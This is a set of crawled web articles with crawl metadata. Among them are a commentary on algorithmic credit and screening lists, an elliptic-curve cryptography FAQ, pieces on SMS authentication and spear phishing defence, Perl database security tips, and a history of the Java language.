Even if an algorithmic prisoner knows he is in a prison, he may not know who his jailer is. Is he unable to get a loan because of a corrupted file at Experian or Equifax? Or could it be TransUnion? His bank could even have its own algorithms to determine a consumer’s creditworthiness. Just think of the needle-in-a-haystack effort consumers must undertake if they are forced to investigate dozens of consumer-reporting companies, looking for the one that threw them behind algorithmic bars. Now imagine a future that contains hundreds of such companies.
A prisoner might not have any idea as to what type of behavior got him sentenced to a jail term. Is he on an enhanced screening list at an airport because of a trip he made to an unstable country, a post on his Facebook page, or a phone call to a friend who has a suspected terrorist friend?
Finally, how does one get his name off an enhanced screening list or correct a credit report? Each case is different. The appeal and pardon process may be very difficult—if there is one.
It is impossible to fathom all the implications of algorithmic prisons. Yet a few things are certain: Even if they do have great economic value for businesses, and even if they do make our country a safer place, as they continue to proliferate, many of us will be injured, seriously inconvenienced, or experience greatly frustrated as a result.
Even if we all believed algorithmic prisons present a serious threat to individual freedom, it would be difficult to come up with a reasonable solution to the problems they create.
I would personally favor requiring all companies to destroy within, say, 48 hours, all data collected about me unless I have given explicit permission otherwise. I would also prohibit the sale of my personal information or its use for advertising.
Well, that is a nice idea but it is fraught with problems. Under those rules, accurate credit reports would be impossible. And I would want law enforcement agencies to have access to all that information subject to the right restrictions and oversight. If the data is destroyed, that would be impossible.
What is clear is that the consumer protections in place at the moment do not suffice. An additional a set of carefully constructed restrictions is required. Being held in any number of algorithmic prisons is a scenario I for one do not want to be caught up in. And I doubt I am alone. | <urn:uuid:4b4201e6-25e3-4705-b39e-e8b027a6be72> | CC-MAIN-2017-04 | http://www.nextgov.com/big-data/2014/02/commentary-welcome-algorithmic-prison/79196/?oref=ng-dropdown | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280730.27/warc/CC-MAIN-20170116095120-00563-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.953626 | 1,534 | 2.53125 | 3 |
OIO is an application development environment that is designed for users, not programmers. It is essentially a tool for creating Web-based forms and reports that serve as a front-end to a PostGres, Oracle or other database.
OIO is designed for the medical world. the project's Web site -- http://www.txoutcome.org -- describes it as "a highly flexible web-based data management system that manages users, patients, and information about patients."
A priesthood of programmers
Ho's aims to revolutionize application development, by enabling users to do the work themselves, without calling on what he calls the "priesthood of programmers," where people who know C++ or Java serve as an interface to the technology.
There is "significant overhead" in the development of most applications today, he says, "with programmers interviewing users, trying to figure out what they want, building something, and going back and asking them if that's what they had in mind."
It can take more time to describe what you want to someone else than to do it yourself, says Ho. "That's why we don't have secretaries typing up letters in anymore. We'll still need programmers, but not for the same things as we do now."
Ho compares OIO with the advent of sophisticated end-user tools like spreadsheets or desktop databases such as Borland's Filemaker or Microsoft's Access, which enabled non-programmers to create applications that previously could only be created using programming languages like Cobol or C.
OIO's object-oriented interface means that end users can customize OIO forms to meet their needs without having to know the structure of the underlying database. "They can create forms or reports without knowing anything about PostGres or Oracle, or how many tables they're using. For them it's just a matter of defining the forms," he says.
Ho began working on OIO in 1998. Today it is in use in the Psychiatry department at Harbor-UCLA Medical Center, both for tracking patient information and for research. It's also in use in the departments of rheumatology and surgery there, as well as in the medical school at the University of Pennsylvania, and several hospitals abroad. Several other hospitals are evaluating it, including Case Western Reserve University Hospital in Cleveland, which is considering using OIO for tracking in anesthesia outcomes.
OIO is based on the open source application server Zope, and written using the open source scripting language Python. Because it is entirely open source, says Ho, it's easy to share work done at UCLA or elsewhere with colleagues across the country, and doctors can easily customize OIO's forms to meet their specific needs.
"Most of the information that we doctors record is the same," Ho says, "with only perhaps 10% difference between sites. OIO aims to allow customization, really quickly, by anyone, including non-programmers, and then allow them to share it easily with other users."
Being able to customize the forms also means that data can be shared between clinical departments and researchers, according to Ho.
"A lot of researchers are very interested in mining clinical data," he says "but there are obstacles standing in the way, both legal, such as patient consent and confidentiality, and technical. You can strip a number of fields off of clinical data to make it anonymous, but with commercial software, it's not easy. Our system makes it easy to do that, so you can make it anonymous at very low cost, which enables research to happen." | <urn:uuid:66c844b8-c5dd-4cd1-884b-cf5042711581> | CC-MAIN-2017-04 | http://www.cioupdate.com/trends/article.php/2234601/An-Open-Source-Approach-To-Developing-Applications----Without-Programmers.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281353.56/warc/CC-MAIN-20170116095121-00379-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.963029 | 722 | 2.625 | 3 |
3.5.1 What are elliptic curve cryptosystems?
Elliptic curve cryptosystems were first proposed independently by Victor Miller [Mil86] and Neal Koblitz [Kob87] in the mid-1980s. At a high level, they are analogs of existing public-key cryptosystems in which modular arithmetic is replaced by operations defined over elliptic curves (see Question 2.3.10). The elliptic curve cryptosystems that have appeared in the literature can be classified into two categories according to whether they are analogs to the RSA system or to discrete logarithm based systems.
Just as in all public-key cryptosystems, the security of elliptic curve cryptosystems relies on the underlying hard mathematical problems (see Section 2.3). It turns out that elliptic curve analogs of the RSA system are mainly of academic interest and offer no practical advantage over the RSA system, since their security is based on the same underlying problem, namely integer factorization. The situation is quite different with elliptic curve variants of discrete logarithm based systems (see Question 2.3.7). The security of such systems depends on the following hard problem: Given two points G and Y on an elliptic curve such that Y = kG (that is, Y is G added to itself k times), find the integer k. This problem is commonly referred to as the elliptic curve discrete logarithm problem.
Presently, the methods for computing general elliptic curve discrete logarithms are much less efficient than those for factoring or computing conventional discrete logarithms. As a result, shorter key sizes can be used to achieve the same security of conventional public-key cryptosystems, which might lead to better memory requirements and improved performance. One can easily construct elliptic curve encryption, signature, and key agreement schemes by making analogs of ElGamal, DSA, and Diffie-Hellman. These variants appear to offer certain implementation advantages over the original schemes, and they have recently drawn more and more attention from both the academic community and the industry. | <urn:uuid:dc353d31-3611-4839-99ef-1d494ed71386> | CC-MAIN-2017-04 | https://www.emc.com/emc-plus/rsa-labs/standards-initiatives/what-are-elliptic-curve-cryptosystems.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281353.56/warc/CC-MAIN-20170116095121-00379-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.948452 | 442 | 3.25 | 3 |
Whether you’re at the cash machine, online to your bank or credit card company or on the phone to your insurance or mortgage provider, until now, the need for greater security has meant added complexity and cost for user and provider alike.
In future, this problem is sure to grow. Consumer-facing organisations want the efficiencies to be gained from e-commerce technologies, and are moving inexorably towards a Web-based interface with their customers.
That could mean asking consumers to navigate increasingly complex layers of password-based authentication, which discourages them from trusting the security of online transactions — only 10 per cent of consumers bank online for this reason. They could also be faced with remembering growing numbers of passwords, enterprises will need to divert scarce resources to helping users recall those passwords, and will continue to have to bear the costs of theft or mistakes following authentication failures.
Yet it doesn’t have to be like that. Security technology can ensure that you keep what’s yours while enabling you to get on with life, letting technology take care of the details. Strong authentication of users that is both easy to use and cost-effective is the answer.
Authentication in a complex world
Consumers in today’s world spend a growing amount of time authenticating their identities to banks, insurance companies, utilities and phone companies, for instance. Before such organisations can process any transactions or information, they need to know that users are who they say they are. In other words, authentication of identity is critical or no trust can exist between the two parties.
Right now, that process consists of what you know — almost invariably a user name and password combination — and, where stronger authentication is required, what you have. This usually takes the form of a hardware or software that generates a second code or PIN, and is known as two-factor authentication.
Names and passwords have a long tradition, going back centuries. They worked well when the numbers to be dealt with were small and a person’s identity could be confirmed by looking at them. In today’s world, that’s not practical, yet reliance continues to be placed in this method, despite its well-publicised weaknesses.
The key problem is that passwords are too easily discovered or guessed — they are often found written down on sticky notes stuck to monitors, for instance. Even when they’re not, passwords can often be derived from well-known information about the user such as their birthday, or spouse, partner or pet’s name. Further, because it’s hard to remember passwords that aren’t standard words — especially as the number of passwords required increases — the average password can often be discovered by a computer attack. This can be achieved using a dictionary or, more time-consuming but ultimately effective, a brute-force lookup that checks every possible combination of characters.
In a corporate environment, end user education as a cornerstone of company security policy can often be the answer to this problem, along with forcing users to update their passwords regularly, and checking the strength of passwords using cracking programs. For consumer applications however, none of these options is realistic. Give customers what they perceive to be a hard time, and a business risks driving them into the arms of the competition.
The mobile future secured
Passwords on their own are too weak to enable full trust, but the alternative is two-factor authentication, which has proven to be both close to unbreakable and is the strongest form of authentication available. Its drawbacks in a consumer application are that it’s also not realistic to expect consumers to carry an additional, special device whose sole function is authentication.
A much better answer is to reap the benefits of two-factor authentication by generating a new password for every authentication using a device that the user already has with them. Research shows that the one device most users both possess and carry with them is their mobile phone.
The way this could work is that the user initiates a transaction, enters their PIN or access code, then the provider of services needing to authenticate someone sends a randomly generated password via SMS to their phone, which they can enter. This proves that they are the right person — a miscreant is highly unlikely to know the user name, the password and possess the phone. And if they are using a browser, a user must enter their access code into the same browser from which they requested it. The ideal solution would also provide non-repudiation, encryption over the link where possible, and would generate passwords that were truly random.
This form of strong authentication shows huge promise. Trials by a number of service providers suggest there are few drawbacks, with the small cost of sending an SMS being offset by the security of knowing they are dealing with the right person.
Compared to other forms of two-factor authentication, the advantages are that:
- such a system would need no extra infrastructure, so deployment costs on a per-user basis will be low;
- because the user is familiar with the hardware, there are no additional training or help desk costs to be borne;
- in some cases, it may help compliance with government, industry, or enterprise regulations for data protection;
- it can be deployed in very large numbers to cover mass markets;
- the user need carry no extra devices around, adding convenience and enabling enterprises to differentiate themselves;
- consumer confidence both in the strength of that security and the protection of their investments from access by the unauthorised will be increased, leading to customer satisfaction and retention.
Only the need for a mobile phone network limits coverage and, even in the US where SMS is not as popular as it is in Europe, trials show that messages both work and travel quickly — one outer limits trial reported a delay between the UK and the US west coast of just four seconds.
When authentication via SMS becomes widespread, businesses and consumers will benefit. In the financial services area, banks and insurance companies are clear beneficiaries. In business to consumer applications, healthcare — ensuring that the consumer is matched, critically, with the right medical records — and bill payment will be transformed. Service providers and enterprises will be able to offer unfettered access to remote users’ desktops no matter where they are, secure that the user can prove their identity.
From a business-to-business perspective, such technology can facilitate supply and buy-side e-commerce, with partners and suppliers being able to authenticate and so gain access to secured extranets, increasing trust between the parties conducting transactions.
Right now, access to information is critical for businesses and consumers alike and this trend is set to grow. What’s needed is a way of authenticating people on a mass-market scale, and using a widely-adopted, easy-to-use technology such as SMS means that access can be secure, more cost-effective and more convenient.
RSA Security’s RSA Mobile, built on its patented, time-synchronous technology and algorithms that deliver proven security to around 13 million end users, provides a platform for consumer-facing organisations to build such a solution. So with RSA Security ready to bring its secure technologies to this market and to fully incorporate industry standards such as Liberty and SAML into future releases, the time is right for this technology.
Both industry and consumers need it, the pre-conditions have been met and the demand is there.
Infosecurity Europe is Europe’s largest and most important information security event. Now in its 8th year, the show features Europe’s most comprehensive FREE education programme, and over 200 exhibitors at the Grand Hall at Olympia from 29th April – 1st May 2003. www.infosec.co.uk | <urn:uuid:0c0b316a-aa88-4d4c-ba28-ef10f062d2df> | CC-MAIN-2017-04 | https://www.helpnetsecurity.com/2003/04/09/mass-market-authentication-the-gateway-to-access-hungry-consumers/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284429.99/warc/CC-MAIN-20170116095124-00195-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.955615 | 1,584 | 2.625 | 3 |
Professor of Economics
Lincoln University, New Zealand
Social Scientist, GNS Science and Director of the Joint Centre for Disaster Research
Massey University, New Zealand
Dr. Thomas Pratt
US Geological Survey, Department of the Interior
Canterbury Department of Emergency Management
Earthquakes in the central and eastern U.S. are rare (low probability) events, but the M5.8 Virginia earthquake in 2011 reminded us that earthquakes can and will occur where least expected. Every earthquake has some consequences and fortunately, the Virginia event was centered far away from any urbanized areas where it could have caused significant damage and injuries. This was not the case for the Canterbury region of New Zealand. The low probability earthquakes that struck in 2010 and 2011 had dire consequences - the M5.5 to M6.3 earthquakes destroyed most of the urban center of Christchurch, with losses totaling 20% of New Zealand’s GDP, killed 185 and injured over 6,000.
This session spotlights the lessons learned in New Zealand. Experts from there who have both personal and professional roles contending with the immediate and long-term consequences of the Canterbury earthquakes will share their real-life experiences. Session discussion will put these lessons into a U.S. context, touching on what could happen if the Virginia earthquake occurred closer to an unsuspecting central or eastern U.S. city and how we might become more resilient physically and economically, not just to the hazards posed by local earthquakes, but by earthquakes worldwide.
- What worked and didn’t work during the response and recovery phases of a major disaster in an environment very similar to that in many moderate-sized US cities,
- What nature can deliver and the potential impacts in a typical, long-lived earthquake sequence,
- Earthquake hazard forecasts regionally and globally. | <urn:uuid:3be470bf-0df8-4662-a870-48e8ddde5139> | CC-MAIN-2017-04 | https://govsecinfo.com/events/govsec-2014/sessions/wednesday/slp2-3.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280761.39/warc/CC-MAIN-20170116095120-00407-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.948683 | 369 | 2.78125 | 3 |
Never Trust the Client
Never trust the client
The customer is always right, but client input should always be assumed to be wrong. Data can be malformed accidentally or maliciously. But either way, it has the potential to cause problems.
Perl provides some excellent tools to sanitize external input data. Make sure that you're stripping "special" characters from input, avoid stored HTML and be careful where you're storing user-supplied data. Use of Perl's "taint" mode will also ensure data generated outside your program as tainted so it cannot accidentally be used as a file name or subprocess command.
"Don't trust data supplied by the browser" should be the foremost rule of thumb.
Your data is yours
You should be very conservative about data that's accepted as input, and even more conservative about data that is sent out. Make use of security features that are available in connecting to your database. Most databases can work with SSL or have other features to ensure that communication between an application server and a database server are encrypted. It's also a good idea to store data in an encrypted state should an attacker actually get so far as gaining access to your data store.
Legacy systems or applications may be constructed in such a way that a native encrypted connector is not possible. That's suboptimal, but not impossible to fix. Use a Secure Shell (SSH) tunnel between systems when SSL is not natively supported by the database connector.
Ensure that session data is encrypted. Any session exchanging personal data between your application and the user over a network should be encrypted, but also look to encrypting session state information when storing session data in a URL. The Crypt::* modules will provide the proper tools to do this and also look to the CGI::EncryptForm module. | <urn:uuid:b157d284-f2cc-4175-ae45-d714020ae9a2> | CC-MAIN-2017-04 | http://www.eweek.com/c/a/Database/How-to-Integrate-LargeScale-Databases-with-Perl/1 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281421.33/warc/CC-MAIN-20170116095121-00223-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.927727 | 369 | 2.921875 | 3 |
Whatever its origin, the Stuxnet worm provided something that few publicly-debated online incidents have offered to date.
For at least 15 years, security experts have warned that cyber attacks would one day strike at “critical infrastructure” – whether it’s power grids, energy supply, air traffic control (in the more extreme imagination of Richard Clarke, at least), emergency services and so on.
By submitting your personal information, you agree that TechTarget and its partners may contact you regarding relevant content, products and special offers.
Real-world incidents have been limited, however: most countries have no single electricity “off-switch” accessible from the Internet, for example. In attacking SCADA software, Stuxnet has acted as a proof-of-concept for something rarely seen in the wild. Arguably, it also demonstrated that environments like SCADA systems are, to date, not typically Internet-connected: its medium of infection was USB keys.
But in a world that’s probably growing weary of the jump-at-shadows mindset of IT security journalism, Stuxnet wasn’t a shadow but a real event.
Dr Prescott Winter, former director and CIO of the US National Security Agency and now CTO (Public Sector) for security vendor ArcSight, argues that it’s time for governments to take a more active role in finding ways to secure the Internet.
Speaking to journalists in Sydney in early October as part of an ArcSight national roadshow, Dr Winter said that while private industry (particularly in America) might chafe at government intervention and regulation of the online world, it’s as inevitable as regulation of air traffic became in the 20th century.
The prime manifestation of the problem, Dr Winter said, is the ongoing problem of the “botnet”. Individuals at home aren’t protected, he told the roadshow; their computers become incubation grounds for botnets.
“Some kind of protective process to clean that up is absolutely essential,” he said.
“There are botnets residing in millions of home computers around the world, and those can be turned-on ‘like that’.”
Today’s “scattershot” approach to the botnet problem isn’t enough protection, he said: “we have bans on aircraft ... bans on ‘bad packets’ is an area governments need to work on.”
And that in itself is a challenge. The “bad packet” problem is international – and around the world, the relationship between the government and the private sector changes from country to country.
Dr Winter said America may not even be the best country to take the lead in protecting Internet users, because of its historical gulf between government and the private sector. As a result, an effort like the IIA’s Internet code of practice is “almost unimaginable in the US.
“I think this case in Australia is going to be very interesting to watch. It seems to have come about with a group of the leading ISPs and service providers coming together to design this solution.
“There are a lot of things it doesn’t have in it yet – but as an initial outline for a policy framework to clean up ... the Australian part of the Internet, it is certainly a commendable start. Eventually, you probably want to make sure that you have all your service providers involved.”
Worms and the Real World
Given that “physical attacks” – damage to infrastructure, attacks on emergency services and the like – hold such a high profile in the popular mind, it’s interesting that Dr Winter nominated attacks against intellectual property as today’s leading concern.
One reason, he said, is that “some action has been taking in protecting the critical systems ... for example, the FAA is getting a complete rebuild from the ground up.”
The shift in emphasis “from catastrophic failure to IP”, Dr Winter said, is because “the steady drain of intellectual property out of the leading technical nations of the world is a major cause for concern.
The investment in developing products and services, he said, is in danger of “leaking” to countries like China, but “IP protection and the integrity of the supply chain are currently lower on most peoples’ threat radar than a catastrophic cyber ‘Pearl Harbour’”.
Security, software and the Cloud
Security would seem to provide a great marketing entree for cloud providers: if everything the home user needs can be hosted by a cloud provider, the user’s exposure to threats could fall dramatically.
However, it’s not playing out that way.
“I don’t think there’s as much progress as any of us would like to see ... we have had some discussions with people at Microsoft about trust models you can begin to build into the Internet.”
“App store” markets are another area Dr Winter would like to see paying more attention to security, since users place an implicit trust in the integrity of the software they download from an app store.
That, however, leads to the vexed question of software quality. If cloud providers and app sellers are expected to warrant that their software is secure, shouldn’t a similar requirement apply to the whole software industry, which typically escapes liability with disclaimers?
Yes: “The software industry has gotten away with murder on this point forever,” Dr Winter said. “Deploy, then fix, is the old habit of the software industry, and that model isn’t viable in the cloud.”
He said software quality processes need to be put into place industry-wide (and world-wide), and this will represent a culture-shock for the software industry. | <urn:uuid:5538299e-e990-4cb0-b0dd-bc5a0e03a503> | CC-MAIN-2017-04 | http://www.computerweekly.com/news/2240022922/Expect-Internet-regulation-Former-NSA-CIO-Prescott-Winter | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279933.49/warc/CC-MAIN-20170116095119-00436-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.956439 | 1,222 | 2.640625 | 3 |
Phishing, and particularly spear phishing, may be low tech, but it remains one of the most potent tools in the cyber criminal’s toolbox. In the past it has usually been used for financial crimes, along with some industrial and national espionage, but there is an alarming increase in attacks aimed at more general intelligence gathering. These may have the aim of discrediting the target organization. Enterprises such as think tanks and universities must now consider themselves potential targets for attacks from nation state actors or hactivists, and take appropriate precautions.
Traditional bulk phishing has very often been aimed at stealing money by obtaining access to financial accounts. PayPal was an early target because of the ease of initiating online transfers. The collection of credit card information or online banking credentials is also commonly attempted. We also see phishing for simple email or messaging credentials that can be used to send further spam.
Bulk spam based phishing of this sort continues to be an annoyance, but is less of a problem than it used to be. Good spam filters will stop the vast majority, and many people are aware of the problem and hopefully less likely to give away their account information to a casual spammer. In fact, developers of phishing tools are now trying to sell these tools cheaply for others to exploit, which is probably a sign that they are not as profitable as they used to be. Here’s a PayPal phishing tool (that also attempts to collect credit card and bank account details) available on the web for $20 in bitcoin.
The fact that this and similar tools are being sold rather than used directly by the creators is probably an indication that PayPal phishing is not as profitable as it used to be.
However spear phishing (that is phishing customized to a particular person or organization), continues to be a significant problem, and as we have reported in the past it is the entry point for a number of the most devastating attacks.
Many spear phishing attacks, especially those aimed at corporate executives, are also financially motivated. One popular attack is an email apparently from a CEO to a CFO with real names and a realistic looking From: address, which requests a wire transfer of some six or seven figure sum to an offshore account. Another is the attempt to obtain employee tax information, to be used in subsequent tax fraud. In some cases phishing may just be an attempt to compromise any account on a corporate network in the hope of escalating privileges to collect credit card data from a point of sale system, as happened in the Target breach.
Spear phishing has also been used for espionage, both industrial and national. Industrial espionage usually seems to be conducted by nation state actors who are passing information about competitors to corporations with close ties to the national government. There have also been successful attacks against a number of US government departments, including the Whitehouse, the State Department, the Joint Chiefs of Staff, and the Office or Personnel Management. In many of these cases we know that spear phishing created the initial breach. Though there have been a few cases such as ThyssenKrupp and Sony Pictures where attacks based on spear phishing have led to actual damage to plant or systems, in most cases the espionage has been limited to intelligence gathering.
Cyber attackers are discovering that the value of intelligence is not limited to data collected from major corporations or governments. The hacking and publication of emails from the Democratic National Committee and the Clinton campaign had a significant and perhaps decisive effect on the recent US election. Attribution of cyber attacks is difficult, but several sources point the finger for this breach on a group known as Cozy Bear (aka The Dukes, aka APT27) who are believed to be working for the Russian government.
Cozy Bear’s intelligence gathering has not been limited to the Clinton campaign. Since July 2015 they have been targeting think tanks, universities, and non-governmental organizations with interests in defense, national security, public policy, and international affairs. Most recently they took advantage of the surprise US election result to send out several waves of election related phishing emails, including some purporting to come from the Clinton Foundation. A system administrator at a think tank or university might not think they need the same sort of security as the State Department or the Joint Chiefs of Staff, but the same cybercriminals are targeting them.
The techniques used by Cozy Bear do not rely on sophisticated zero day exploits. Zero days are expensive to buy or locate, and will most likely be discovered and patched if you start using them regularly. Instead, Cozy Bear simply tricks the user into installing malware on their machine. We see very similar techniques used by ransomware and other forms of malware spam: malicious executables in password protected compressed files, documents containing malicious macros, and .lnk files containing PowerShell scripts.
Putting an executable in a password protected compressed file means that virus-scanning software cannot review and block the executable. The password is included in the body of the email message. Encrypting an attachment and then including the password in plain text in the message adds no security whatsoever except protection against virus-scanning, so it should be regarded as a big red flag.
Microsoft Office has long supported a powerful macro language, Visual Basic for Applications, for automating tasks within documents. Unfortunately these tasks can include the installation of malware over the Internet. As a security measure macros are disabled by default on downloaded content, and the user must click on a button to turn them on. Rather than give the button a meaningful label like, “Click This Button To Make The Entire Contents Of Your System Available To Russian Hackers,” it is called, “Enable Content”. Spammers use various forms of social engineering in the documents to trick users into turning on macros. Here’s an example of a malware installer.
If you do not need them, we would recommend disabling Office macros globally. System administrators can do this for an organization using a group policy.
PowerShell is a Windows scripting language released in November 2006 that allows the automation of administrative tasks. Yes, this can include the installation of malware over the Internet as well. .lnk files are usually used to contain browser links, but they can also be used to link to a file on your own computer, or even run a PowerShell script encoded in the .lnk file. Thanks, Microsoft. It is possible to disable PowerShell for an enterprise but this may be problematic as it frequently used for system administration.
All of these attacks only affect Windows machines. If you read your mail on your mobile device you are less likely to be hacked. Sometimes a malicious document will claim that the content is only available on Windows machines, so you should go and read it on one. It’s easy to make a document cross platform, but it is harder to do that for a malware attack, so this is another big red flag.
To conclude, phishing for information or access is as much or more of a problem as phishing for financial data. You may be subject to phishing attacks not only because of who you are, but also because of who you communicate with or do business with. (The Target breach was started by a phishing attack on their HVAC contractor.) Treat all unsolicited email with extreme suspicion, don’t click on links or open attachments, and use secure methods of communication rather than email wherever possible. | <urn:uuid:d7faaa7c-efde-4aa9-b63c-dd6abfa187f4> | CC-MAIN-2017-04 | https://blog.cloudmark.com/2016/11/16/spear-phishing-not-just-for-finance/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279933.49/warc/CC-MAIN-20170116095119-00436-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.953761 | 1,506 | 2.6875 | 3 |
Summer heat increases need for medication temperature monitoring
Wednesday, Jul 24th 2013
As extreme heat grips the country, pharmacies, patients and anyone else storing prescription drugs need to keep medication cool using temperature monitoring equipment in order to ensure its effectiveness.
In months like July and August, temperatures can easily exceed 90 degrees Fahrenheit in most of the United States on an especially hot day. Inside cars or mailboxes, temperatures can get as high as 100 degrees or even up to 140 degrees F. Although this is not new information, it is especially noteworthy for anyone storing prescription medication.
Not everyone may realize it, but prescription medication can break down under extreme heat. Papatya Tankut, vice president of professional pharmacy services for CVS pharmacy, told AgingCare.com that ideally prescription drugs should be kept at a temperature between 68 and 77 degrees.
However, proper storage can vary depending on the type of drug in questions, according to AgingCare.com. For instance, inhaled prescriptions, diabetes medication and eye drops often have specific care instructions that can fall outside the median norm. When prescription medication is not kept under these ideal conditions, the heat can change the chemical composition of the drug in question and potentially make them ineffective, pharmacist Khoa Huynh told ABC affiliate KFSN.
How summer affects prescription drug temperature monitoring
For most individuals and organizations, keeping medication at this range at all times is simple thanks to temperature-controlled rooms or cold storage units. However, summer can complicate these measures.
In particular, the transportation aspect of the prescription drug supply chain is especially fraught with potential issues during the summer. Even though a medication may be kept at ideal conditions at the pharmacy, leaving it in a hot car or inside a mailbox for even a few hours can render the drug unusable. As such, organizations and people should take every precaution possible to limit the amount of time a medication is transported in a vehicle during the summer months. After all, even forgetting a bottle of pills in a car for just a few minutes can be all the time that's needed for them to go bad.
"We should always check," Huynh advised people who transport medication in their cars, according to KFSN. "Definitely check the backseat, check your console just to make sure you don't have any of your eye drops or medications and just take it out, take it with you, put it in your bag and it should be safe that way."
Another potential issue is the threat posed by brownouts and blackouts. Between severe thunderstorms or air conditioning units draining electricity resources, power outages are a constant problem in many parts of the country during the summer months. As such, individuals and organizations that keep prescription medication in refrigeration units should be sure to have contingency plans in place just in case the power goes out, according to AgingCare.com.
Regardless of the time of year, healthcare providers and others should utilize temperature monitoring equipment like a temperature sensor to make sure prescription drugs are always kept at the right temperature. Since heat can damage life-saving medication, it is imperative that the drugs are not placed in a room that will cause them to break down and become ineffective. | <urn:uuid:1e035a99-8370-4115-887e-d2efb69f055b> | CC-MAIN-2017-04 | http://www.itwatchdogs.com/environmental-monitoring-news/healthcare/summer-heat-increases-need-for-medication-temperature-monitoring-477397 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280774.51/warc/CC-MAIN-20170116095120-00252-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.943525 | 647 | 2.59375 | 3 |
After 20 years, the Java phenomenon just keeps going
This year marks the 20th anniversary of one of the most widely-used programming languages in computing: Java. Given how prolific it continues to be, Java has undoubtedly revolutionized IT and has permeated computing to the point where despite its age, it is still one of the most relevant and highly applicable languages available. To properly understand the impact of Java on computing and its future, it’s important to understand where Java came from, and how (and why) it was conceived of in the first place.
Java was born in the early 1990s out of a frustration with Sun Microsystems’s C++ and C application programming interfaces (APIs), and the desire to build a functional alternative to C++ and C programming languages. Three primary objectives underscored the creation of Java: 1) to replace C and C++ (languages from which Java derived much of its syntax) with a more functional, robust design, 2) to enable the building and deployment of apps for the Internet, and 3) to be lightweight, portable, and able to function in distributed environments.
Java, which has been owned and curated by Oracle Corporation since 2010, was developed at a time when the Internet was just beginning to gain traction with the masses. It was fundamentally designed to operate and usher in a new era of internet-based programming and the pre-eminence of the World Wide Web. (In 2015, Oracle offers a fistful of Java certifications, and is currently offering an anniversary discount of 20 percent off the cost of exams.)
The fact that Java is such a well-founded programming language has given it time to mature and find several specific facets of programming in which it remains unmatched. Despite the fact that two decades have passed since its original conception, Java is still one of the most popular, widely-used programming languages because it successfully solved many of the problems that plagued programmers in the early 1990s — and continues to solve these problems today.
Advantages of Java
Mild Learning Curve: One of the primary advantages of Java is its relatively mild learning curve. This stems largely from the fact that much of its syntax is derived from various C-based programming languages that programmers and developers are already amply proficient in. Java was designed specifically with ease of use in mind, making it significantly easier to learn, write, compile and debug than other programming languages.
Platform Independence: As was previously mentioned, portability was such a key feature that Java’s original creators wanted to underscore every aspect of it. A major reason for Java’s sustained popularity is its platform independence at both the source and binary levels, meaning that Java programs can be run on many different types of computers. As long as the computer in question has a Java Runtime Environment (JRE) installed, virtually any computer can run Java applications whether it’s a cell phone, a Windows PC, an Apple computer, or a Linux/Unix platform.
Object-orientation: Java’s programming syntax is object-oriented, meaning that its programs consist of elements referred to as objects. Object-oriented languages liked Java allow users to write reusable code and create modular programs and applications.
Distribution: Java was designed specifically to be distributed, meaning that Java contains an easy-to-use, robust platform that allows two or more computers to work on a network. Users and proponents of Java have repeatedly cited the unmatched ease of writing networking programs in Java as one of its principal advantages when compared to other programming languages.
Despite its obvious advantages over other programming languages, recent years have exposed significant security issues inherent to Java that make many industry experts question its long-term viability as a widely-used computing language.
Java contains several security vulnerabilities that make it especially prone to malicious attacks from hackers and other undesirable third-parties. Specifically, significant weaknesses in Java’s sandboxing mechanism allow skilled hackers to bypass security restrictions imposed by the security manager. Additionally, the Java class library contains several vulnerabilities that hackers can easily exploit.
Traditionally, Java applications employed either testing-based or network-based security programs, neither of which has proven successful in fixing Java’s substantial security issues. Network-based approaches have proven clumsy at best, as they rely on loose security standards to ensure that authorized traffic is not improperly categorized as unauthorized and blocked accordingly. Testing-based security programs on the other hand often generate far too many frivolous security holes and as a result, make it difficult for developers to prioritize key security issues and focus their efforts mostly on them.
It is worth noting that a substantial portion of Java’s security problems stem from the fact that less than one percent of enterprises were running the latest version of Java according to a 2013 survey conducted by Bit9 that analyzed roughly 1 million endpoints at hundreds of enterprises across the globe. This stems largely from the fact that patching Java is a particularly tedious and time-consuming process.
The Future of Java
While certainly far from perfect, Java contains several integral features and characteristics that continue to drive its popularity and, as such, it is likely that Java will continue to be a popular and widely-trusted programming language for years to come. While some of this sustained popularity is undoubtedly inertia and derivative of the fact that so many large organizations and enterprises already use Java, the success of Android (which uses Java extensively) demonstrates that the programming language can certainly adapt to changing trends in technology and the marketplace.
Java is seeing especially prominent rates of adoption in Big Data and The Internet of Things (IoT). In recent years, the amount of data that we produce (and subsequently analyze) has grown exponentially, and Java has rapidly evolved to become the developers’ language of choice for Big Data analysis and the IoT. Programmers cite the adoption of Java by industry giants such as Facebook, Java’s extensive and exceptional collection of open source libraries, and the fact that it is already as widespread as the major reasons why Java will sustain the future of Big Data and the IoT for the foreseeable future.
Despite its security flaws and its age, Java has reshaped the world of programming and will likely continue to do so for years to come. 2015 marks the marks its twentieth anniversary and given Java’s remarkable ability to stay relevant despite massive and constant changes in technology over the past twenty years, it is likely that we will be celebrating the language’s 25th anniversary in 2020. | <urn:uuid:275c9b41-3306-44c0-9fe1-3d2579a9d8d3> | CC-MAIN-2017-04 | http://certmag.com/20-years-java-phenomenon-just-keeps-going/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281426.63/warc/CC-MAIN-20170116095121-00068-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.959197 | 1,316 | 3.015625 | 3 |
